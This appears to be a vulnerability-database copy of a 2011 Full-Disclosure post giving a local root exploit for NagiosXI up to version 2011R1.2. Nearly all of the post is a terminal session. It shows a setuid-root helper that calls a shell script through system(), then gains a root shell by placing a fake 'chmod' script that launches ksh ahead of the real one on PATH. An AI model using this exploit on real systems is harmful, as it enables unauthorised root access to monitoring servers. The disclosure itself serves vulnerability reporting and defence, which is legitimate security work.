Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26364
HistoryMay 13, 2011 - 12:00 a.m.

[Full-disclosure] NagiosXI (commerciale Nagios) Local Root

2011-05-1300:00:00
vulners.com
17
JSON

Exploit Title: NagiosXI (Commercial Nagios) Local Root

Vulnerability

Date: 2011-05-15

Author: RootBSD

Software Link: http://www.nagios.com

Version: <= 2011R1.2

Tested on: all linux

rootbsd@laptop:~$ id
uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd)
rootbsd@laptop:~$ ls -l
/usr/local/nagiosxi/scripts/reset_config_perms
-rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38
reset_config_perms
rootbsd@laptop:~$ cat
/usr/local/nagiosxi/scripts/reset_config_perms.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
if(setuid( 0 )!=0)
printf("ERROR TRYING TO SETUID ROOT!\n");
else
printf("SETUID ROOT OK\n");
system(
"/usr/local/nagiosxi/scripts/reset_config_perms.sh" );

return 0;
}

rootbsd@laptop:~$ cat /home/rootbsd/chmod
#!/usr/bin/ksh
ksh
rootbsd@laptop:~$ chmod 755 /home/rootbsd/chmod
rootbsd@laptop:~$ export PATH=/home/rootbsd:$PATH
rootbsd@laptop:~$
/usr/local/nagiosxi/scripts/reset_config_perms
SETUID ROOT OK
RESETTING PERMS

id

uid=0(root) gid=0(root) groupes=0(root)

JSON